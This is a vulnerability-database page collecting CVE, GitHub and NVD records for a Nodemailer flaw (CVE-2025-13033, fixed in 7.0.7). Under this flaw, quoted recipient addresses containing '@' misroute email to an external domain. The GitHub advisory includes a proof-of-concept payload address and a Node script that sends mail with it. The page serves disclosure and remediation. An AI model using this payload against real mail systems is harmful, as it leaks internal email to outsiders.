CVE-2025-13033 (GCVE-0-2025-13033)
Vulnerability from cvelistv5 – Published: 2025-11-14 19:37 – Updated: 2025-11-14 20:00
VLAI?
Summary
A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.
Severity ?
7.5 (High)
CWE
- CWE-436 - Interpretation Conflict
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Advanced Cluster Management for Kubernetes 2 |
cpe:/a:redhat:acm:2 |
||||||||||||
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-13033",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-14T20:00:22.140079Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-14T20:00:51.936Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "affected",
"packageName": "rhacm2/acm-grafana-rhel9",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ceph_storage:8"
],
"defaultStatus": "affected",
"packageName": "rhceph/grafana-rhel9",
"product": "Red Hat Ceph Storage 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhdh:1"
],
"defaultStatus": "affected",
"packageName": "rhdh/rhdh-hub-rhel9",
"product": "Red Hat Developer Hub",
"vendor": "Red Hat"
}
],
"datePublic": "2025-10-07T13:42:02.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-436",
"description": "Interpretation Conflict",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-14T19:37:08.224Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
},
{
"name": "RHBZ#2402179",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
},
{
"url": "https://github.com/nodemailer/nodemailer"
},
{
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
},
{
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-10-07T15:03:14.483722+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2025-10-07T13:42:02+00:00",
"value": "Made public."
}
],
"title": "Nodemailer: nodemailer: email to an unintended domain can occur due to interpretation conflict",
"workarounds": [
{
"lang": "en",
"value": "Currently there\u0027s no available mitigation for this flaw."
}
],
"x_redhatCweChain": "(CWE-20|CWE-436): Improper Input Validation or Interpretation Conflict"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2025-13033",
"datePublished": "2025-11-14T19:37:08.224Z",
"dateReserved": "2025-11-11T16:15:03.749Z",
"dateUpdated": "2025-11-14T20:00:51.936Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-13033\",\"sourceIdentifier\":\"secalert@redhat.com\",\"published\":\"2025-11-14T20:15:45.957\",\"lastModified\":\"2025-11-18T14:06:55.963\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"secalert@redhat.com\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"secalert@redhat.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-436\"}]}],\"references\":[{\"url\":\"https://access.redhat.com/security/cve/CVE-2025-13033\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=2402179\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://github.com/nodemailer/nodemailer\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87\",\"source\":\"secalert@redhat.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-13033\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-14T20:00:22.140079Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-14T20:00:42.733Z\"}}], \"cna\": {\"title\": \"Nodemailer: nodemailer: email to an unintended domain can occur due to interpretation conflict\", \"metrics\": [{\"other\": {\"type\": \"Red Hat severity rating\", \"content\": {\"value\": \"Moderate\", \"namespace\": \"https://access.redhat.com/security/updates/classification/\"}}}, {\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"cpes\": [\"cpe:/a:redhat:acm:2\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Advanced Cluster Management for Kubernetes 2\", \"packageName\": \"rhacm2/acm-grafana-rhel9\", \"collectionURL\": \"https://access.redhat.com/downloads/content/package-browser/\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:ceph_storage:8\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Ceph Storage 8\", \"packageName\": \"rhceph/grafana-rhel9\", \"collectionURL\": \"https://access.redhat.com/downloads/content/package-browser/\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:rhdh:1\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Developer Hub\", \"packageName\": \"rhdh/rhdh-hub-rhel9\", \"collectionURL\": \"https://access.redhat.com/downloads/content/package-browser/\", \"defaultStatus\": \"affected\"}], \"timeline\": [{\"lang\": \"en\", \"time\": \"2025-10-07T15:03:14.483722+00:00\", \"value\": \"Reported to Red Hat.\"}, {\"lang\": \"en\", \"time\": \"2025-10-07T13:42:02+00:00\", \"value\": \"Made public.\"}], \"datePublic\": \"2025-10-07T13:42:02.000Z\", \"references\": [{\"url\": \"https://access.redhat.com/security/cve/CVE-2025-13033\", \"tags\": [\"vdb-entry\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://bugzilla.redhat.com/show_bug.cgi?id=2402179\", \"name\": \"RHBZ#2402179\", \"tags\": [\"issue-tracking\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://github.com/nodemailer/nodemailer\"}, {\"url\": \"https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626\"}, {\"url\": \"https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87\"}], \"workarounds\": [{\"lang\": \"en\", \"value\": \"Currently there\u0027s no available mitigation for this flaw.\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-436\", \"description\": \"Interpretation Conflict\"}]}], \"providerMetadata\": {\"orgId\": \"53f830b8-0a3f-465b-8143-3b8a9948e749\", \"shortName\": \"redhat\", \"dateUpdated\": \"2025-11-14T19:37:08.224Z\"}, \"x_redhatCweChain\": \"(CWE-20|CWE-436): Improper Input Validation or Interpretation Conflict\"}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-13033\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-14T20:00:51.936Z\", \"dateReserved\": \"2025-11-11T16:15:03.749Z\", \"assignerOrgId\": \"53f830b8-0a3f-465b-8143-3b8a9948e749\", \"datePublished\": \"2025-11-14T19:37:08.224Z\", \"assignerShortName\": \"redhat\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-MM7P-FCC7-PG87
Vulnerability from github – Published: 2025-10-07 13:42 – Updated: 2025-11-17 17:29
VLAI?
Summary
Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict
Details
The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.
Payload: "xclow3n@gmail.com x"@internal.domain
Using the following code to send mail
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
service: "gmail",
auth: {
user: "",
pass: "",
},
});
let mailOptions = {
from: '"Test Sender" <your_email@gmail.com>',
to: "\"xclow3n@gmail.com x\"@internal.domain",
subject: "Hello from Nodemailer",
text: "This is a test email sent using Gmail SMTP and Nodemailer!",
};
transporter.sendMail(mailOptions, (error, info) => {
if (error) {
return console.log("Error: ", error);
}
console.log("Message sent: %s", info.messageId);
});
(async () => {
const parser = await import("@sparser/email-address-parser");
const { EmailAddress, ParsingOptions } = parser.default;
const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);
if (!parsed) {
console.error("Invalid email address:", mailOptions.to);
return;
}
console.log("Parsed email:", {
address: `${parsed.localPart}@${parsed.domain}`,
local: parsed.localPart,
domain: parsed.domain,
});
})();
Running the script and seeing how this mail is parsed according to RFC
Parsed email: {
address: '"xclow3n@gmail.com x"@internal.domain',
local: '"xclow3n@gmail.com x"',
domain: 'internal.domain'
}
But the email is sent to xclow3n@gmail.com
Impact:
-
Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.
-
Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.
-
Potential compliance issue: Violates RFC 5321/5322 parsing rules.
-
Domain based access control bypass in downstream applications using your library to send mails
Recommendations
-
Fix parser to correctly treat quoted local-parts per RFC 5321/5322.
-
Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-13033"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-07T13:42:02Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.\n\nPayload: `\"xclow3n@gmail.com x\"@internal.domain`\nUsing the following code to send mail\n```\nconst nodemailer = require(\"nodemailer\");\n\nlet transporter = nodemailer.createTransport({\n service: \"gmail\",\n auth: {\n user: \"\",\n pass: \"\",\n },\n});\n\nlet mailOptions = {\n from: \u0027\"Test Sender\" \u003cyour_email@gmail.com\u003e\u0027, \n to: \"\\\"xclow3n@gmail.com x\\\"@internal.domain\",\n subject: \"Hello from Nodemailer\",\n text: \"This is a test email sent using Gmail SMTP and Nodemailer!\",\n};\n\ntransporter.sendMail(mailOptions, (error, info) =\u003e {\n if (error) {\n return console.log(\"Error: \", error);\n }\n console.log(\"Message sent: %s\", info.messageId);\n\n});\n\n\n(async () =\u003e {\n const parser = await import(\"@sparser/email-address-parser\");\n const { EmailAddress, ParsingOptions } = parser.default;\n const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);\n\n if (!parsed) {\n console.error(\"Invalid email address:\", mailOptions.to);\n return;\n }\n\n console.log(\"Parsed email:\", {\n address: `${parsed.localPart}@${parsed.domain}`,\n local: parsed.localPart,\n domain: parsed.domain,\n });\n})();\n```\n\nRunning the script and seeing how this mail is parsed according to RFC\n\n```\nParsed email: {\n address: \u0027\"xclow3n@gmail.com x\"@internal.domain\u0027,\n local: \u0027\"xclow3n@gmail.com x\"\u0027,\n domain: \u0027internal.domain\u0027\n}\n```\n\nBut the email is sent to `xclow3n@gmail.com`\n\n\u003cimg width=\"2128\" height=\"439\" alt=\"Image\" src=\"https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d\" /\u003e\n\n\n### Impact:\n\n- Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.\n\n- Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.\n\n- Potential compliance issue: Violates RFC 5321/5322 parsing rules.\n\n- Domain based access control bypass in downstream applications using your library to send mails\n\n### Recommendations\n\n- Fix parser to correctly treat quoted local-parts per RFC 5321/5322.\n\n- Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.",
"id": "GHSA-mm7p-fcc7-pg87",
"modified": "2025-11-17T17:29:26Z",
"published": "2025-10-07T13:42:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13033"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict"
}
GHSA-JJ37-3377-M6VV
Vulnerability from github – Published: 2025-11-14 21:30 – Updated: 2025-11-17 17:17
VLAI?
Summary
Duplicate Advisory: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict
Details
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-mm7p-fcc7-pg87. This link is maintained to preserve external references.
Original Description
A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-17T17:17:33Z",
"nvd_published_at": "2025-11-14T20:15:45Z",
"severity": "HIGH"
},
"details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-mm7p-fcc7-pg87. This link is maintained to preserve external references.\n\n## Original Description\nA vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.",
"id": "GHSA-jj37-3377-m6vv",
"modified": "2025-11-17T17:17:33Z",
"published": "2025-11-14T21:30:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13033"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Duplicate Advisory: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict",
"withdrawn": "2025-11-17T17:17:33Z"
}
FKIE_CVE-2025-13033
Vulnerability from fkie_nvd - Published: 2025-11-14 20:15 - Updated: 2025-11-18 14:06
Severity ?
Summary
A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls."
}
],
"id": "CVE-2025-13033",
"lastModified": "2025-11-18T14:06:55.963",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "secalert@redhat.com",
"type": "Primary"
}
]
},
"published": "2025-11-14T20:15:45.957",
"references": [
{
"source": "secalert@redhat.com",
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
},
{
"source": "secalert@redhat.com",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
},
{
"source": "secalert@redhat.com",
"url": "https://github.com/nodemailer/nodemailer"
},
{
"source": "secalert@redhat.com",
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
},
{
"source": "secalert@redhat.com",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
}
],
"sourceIdentifier": "secalert@redhat.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-436"
}
],
"source": "secalert@redhat.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…